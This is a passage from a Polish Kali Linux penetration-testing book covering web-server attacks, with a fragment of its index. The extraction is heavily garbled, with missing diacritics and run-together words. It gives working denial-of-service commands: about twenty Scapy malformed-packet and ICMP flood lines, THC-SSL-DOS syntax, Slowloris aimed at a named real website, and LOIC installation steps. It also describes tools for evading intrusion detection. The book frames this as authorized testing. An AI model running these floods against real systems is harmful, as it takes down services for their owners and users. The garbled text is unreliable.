Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
